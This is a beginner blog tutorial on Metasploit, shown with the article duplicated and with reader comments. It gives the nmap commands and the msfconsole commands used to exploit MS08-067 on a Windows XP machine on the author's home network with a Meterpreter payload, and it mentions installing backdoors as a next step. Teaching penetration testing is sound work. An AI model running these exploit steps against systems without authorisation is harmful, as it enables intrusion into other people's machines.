An Introduction To The Metasploit Framework [Published]
What is the Metasploit Framework?
The Metasploit Framework is an incredible tool for pen-testers and hackers. Used globally by even the most professional of penetration testers, Metasploit presents the user with a large number of exploits, payloads and auxiliary modules which can all be used to test anything from the common household machine to complex servers in an office block. Whatever your reason is for using the Metasploit framework, you should rest assured that it will be one of the best tools in your arsenal.
Starting up Metasploit
Now, without further ado, let's get down to business. I usually start by firing up Metasploit in a terminal, using the msfconsole version. Metasploit has a few different versions, including a more graphically based one. They all have their purposes, but I much prefer msfconsole just because it's all command line based, and it's very powerful. To start msfconsole, open up your terminal and type;
Hit enter, and let it do it's thing. If you've just updated or it's your first time running the tool then it might take a little while to get started.
Updating the Metasploit Framework
Before we get started, you'll probably need to update a few things. Run the command "msfupdate". Inside each update, you will find new exploits, various patches, improvements, new payloads - basically everything you can think of. It's a very well maintained piece of kit! I usually update the whole system before doing anything major anyway, just in case there's been a significant update in one of my packages. Once you start updating, it will look something like this...
Building Information on the Target using Nmap
Before we run in all-guns-blazing and cause a big mess, we need to build up some information on our target. The basic things which we will need to determine are as follows;
Target's IP address (this will be internal for the sake of this guide)
Which ports are open
Which service is running on each port
The operating system of the target machine
As you go deeper into the world of pen-testing, you may find that you need more information on the subject. In fact, I recommend that you find out as much as you possibly can before starting a pen-test, using various information gathering techniques. I won't go into detail here but I might write something on it in another article.
Open up a new terminal. We're going to be using Nmap to identify the IP address of the target machine on the network by running a ping-scan. This doesn't test any ports, it just pings machines to see if they exist or not.
Running this command should return the IP addresses of machines on your network. Obviously you may need to switch your IP address up a little bit if it's different to mine.
So, I've picked the machine I want to attack. In my case, it's the Intel machine using the internal IP address of 192.168.0.6. Now, let's get some more in depth information about this particular machine by running a port scan on it. I'm not going to bother with any real stealth on this scan seeing as it's on my own network and I'm not trying to avoid detection. Therefore, I'll only be using the -sS, -vv and -A flags for scanning. For a full list of nmap flags, check out the Nmap website. Run the command;
This kicks out a shit load of information onto my screen (thanks to the -vv flag, which makes the scan output "very verbose"). The main thing I'm looking at are the open ports on the machine.
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn
445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds
2869/tcp open http Microsoft HTTPAPI httpd 1.0 (SSDP/UPnP)
The bolded one is the one which I am going to try and exploit using the Metasploit framework. Unfortunately, I'm not going to do all the hard work for you. You need to get your Google hat on and start searching around for exploits for the services which came up in your nmap scan! Once you've found one, you might find that it's already a part of the Metasploit Framework and you can search for it using the "search" function.
How to use Metasploit to Exploit a Computer
Please note that I'm using old screenshots in this section as my laptop died. Everything is exactly the same, including the port/service and IP address used! Just don't mind the old-school Backtrack design.
So, we've got our IP address, our open ports, the services running on each port, and we've determined which service we're going to exploit. Now we can get down to the fun part - exploiting and gaining access to the machine! Switch back to your msfconsole window and you should find that everything is loaded and ready to go. We're going to do things in the following order;
1. Search for and use an exploit
2. Set the payload
3. Set options
4. Run the exploit
1. To search for an exploit, type the word "search" followed by the keyword you wish to search for. For example, I'm looking for the ms08_067_netapi exploit, so I type the following into the search;
If you want to instead display every single exploit available in the Metasploit Framework, type "show exploits" into the console. Once you have found your exploit, you will need to "use" it so that Metasploit knows that it's the one you want. To do this, type the following, replacing my exploit with your chosen one;
2. Next, you are going to need to set the payload which you will be using. A payload is something which runs after the exploit has been run, and can do many different things. For example, you may want to get a shell on the victim, in which case you'd choose one of the shell payloads. However, in this example I will be using a Meterpreter payload. Meterpreter is a very fun tool and I think you'll enjoy it the most out of them all.
To show all the payloads available, simply type in the following;
Or you can search for a specific one like I did, by typing;
To set your payload, type the following into the console, replacing my payload with one of your choice;
3. Once your payload is set, we need to quickly set a few options up. Type the following into your console to get the options up;
In my case, all I need to do is set the RHOST which is the IP address of the target machine. It's already chosen the correct port for me.
4.Finally, we're ready to run the exploit! It's as simple as typing...
Now, you'll see the exploit getting to work!
I've popped open a Meterpreter session, as you can see in the screenshot. This allows me to do a shit load of stuff, which you can read about in the Metasploit Unleashed guide. For the purpose of the guide, I popped open a shell on the other computer after migrating to a different process. This shows the power of the Metasploit Framework and Meterpreter!
So, what next?
This guide was designed to push you in the right direction, as I really wanted something like this to read when I was first learning about MSF. Next, you should read about maintaining access to the computer with a backdoor, and other things. I totally recommend reading up on a few things though, so check out these links for more information.
Metasploit Unleashed
Nmap Reference Guide
The Metasploit Framework is an incredible tool for pen-testers and hackers. Used globally by even the most professional of penetration testers, Metasploit presents the user with a large number of exploits, payloads and auxiliary modules which can all be used to test anything from the common household machine to complex servers in an office block. Whatever your reason is for using the Metasploit framework, you should rest assured that it will be one of the best tools in your arsenal.
Starting up Metasploit
Now, without further ado, let's get down to business. I usually start by firing up Metasploit in a terminal, using the msfconsole version. Metasploit has a few different versions, including a more graphically based one. They all have their purposes, but I much prefer msfconsole just because it's all command line based, and it's very powerful. To start msfconsole, open up your terminal and type;
msfconsole
Hit enter, and let it do it's thing. If you've just updated or it's your first time running the tool then it might take a little while to get started.
Updating the Metasploit Framework
Before we get started, you'll probably need to update a few things. Run the command "msfupdate". Inside each update, you will find new exploits, various patches, improvements, new payloads - basically everything you can think of. It's a very well maintained piece of kit! I usually update the whole system before doing anything major anyway, just in case there's been a significant update in one of my packages. Once you start updating, it will look something like this...
Building Information on the Target using Nmap
Before we run in all-guns-blazing and cause a big mess, we need to build up some information on our target. The basic things which we will need to determine are as follows;
Target's IP address (this will be internal for the sake of this guide)
Which ports are open
Which service is running on each port
The operating system of the target machine
As you go deeper into the world of pen-testing, you may find that you need more information on the subject. In fact, I recommend that you find out as much as you possibly can before starting a pen-test, using various information gathering techniques. I won't go into detail here but I might write something on it in another article.
Open up a new terminal. We're going to be using Nmap to identify the IP address of the target machine on the network by running a ping-scan. This doesn't test any ports, it just pings machines to see if they exist or not.
nmap -sP 192.168.0.1/24
Running this command should return the IP addresses of machines on your network. Obviously you may need to switch your IP address up a little bit if it's different to mine.
So, I've picked the machine I want to attack. In my case, it's the Intel machine using the internal IP address of 192.168.0.6. Now, let's get some more in depth information about this particular machine by running a port scan on it. I'm not going to bother with any real stealth on this scan seeing as it's on my own network and I'm not trying to avoid detection. Therefore, I'll only be using the -sS, -vv and -A flags for scanning. For a full list of nmap flags, check out the Nmap website. Run the command;
nmap -sS -A -vv 192.168.0.6
This kicks out a shit load of information onto my screen (thanks to the -vv flag, which makes the scan output "very verbose"). The main thing I'm looking at are the open ports on the machine.
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn
445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds
2869/tcp open http Microsoft HTTPAPI httpd 1.0 (SSDP/UPnP)
The bolded one is the one which I am going to try and exploit using the Metasploit framework. Unfortunately, I'm not going to do all the hard work for you. You need to get your Google hat on and start searching around for exploits for the services which came up in your nmap scan! Once you've found one, you might find that it's already a part of the Metasploit Framework and you can search for it using the "search" function.
How to use Metasploit to Exploit a Computer
Please note that I'm using old screenshots in this section as my laptop died. Everything is exactly the same, including the port/service and IP address used! Just don't mind the old-school Backtrack design.
So, we've got our IP address, our open ports, the services running on each port, and we've determined which service we're going to exploit. Now we can get down to the fun part - exploiting and gaining access to the machine! Switch back to your msfconsole window and you should find that everything is loaded and ready to go. We're going to do things in the following order;
1. Search for and use an exploit
2. Set the payload
3. Set options
4. Run the exploit
1. To search for an exploit, type the word "search" followed by the keyword you wish to search for. For example, I'm looking for the ms08_067_netapi exploit, so I type the following into the search;
search ms08_067
If you want to instead display every single exploit available in the Metasploit Framework, type "show exploits" into the console. Once you have found your exploit, you will need to "use" it so that Metasploit knows that it's the one you want. To do this, type the following, replacing my exploit with your chosen one;
use exploit/windows/smb/ms08_067_netapi
2. Next, you are going to need to set the payload which you will be using. A payload is something which runs after the exploit has been run, and can do many different things. For example, you may want to get a shell on the victim, in which case you'd choose one of the shell payloads. However, in this example I will be using a Meterpreter payload. Meterpreter is a very fun tool and I think you'll enjoy it the most out of them all.
To show all the payloads available, simply type in the following;
show payloads
Or you can search for a specific one like I did, by typing;
search payloads meterpreter
To set your payload, type the following into the console, replacing my payload with one of your choice;
set PAYLOAD windows/meterpreter/bind_tcp
3. Once your payload is set, we need to quickly set a few options up. Type the following into your console to get the options up;
show options
In my case, all I need to do is set the RHOST which is the IP address of the target machine. It's already chosen the correct port for me.
4.Finally, we're ready to run the exploit! It's as simple as typing...
exploit
Now, you'll see the exploit getting to work!
I've popped open a Meterpreter session, as you can see in the screenshot. This allows me to do a shit load of stuff, which you can read about in the Metasploit Unleashed guide. For the purpose of the guide, I popped open a shell on the other computer after migrating to a different process. This shows the power of the Metasploit Framework and Meterpreter!
So, what next?
This guide was designed to push you in the right direction, as I really wanted something like this to read when I was first learning about MSF. Next, you should read about maintaining access to the computer with a backdoor, and other things. I totally recommend reading up on a few things though, so check out these links for more information.
Metasploit Unleashed
Nmap Reference Guide
Comments
And yeah Buddha, that's a good reason to get started with it! This isn't the best guide in the world but I thought it would push you in the right direction. You need to read through that Metasploit Unleashed Wiki that I linked to - it's probably THE best guide on Metasploit out there.
It's a live-CD (like knoppix) it's roughly 1.5GB though...
Pretty sure I already added this to the CMS straight after I wrote it, but I can't remember. I definitely forgot to put the [Published] bit on the end though, lol.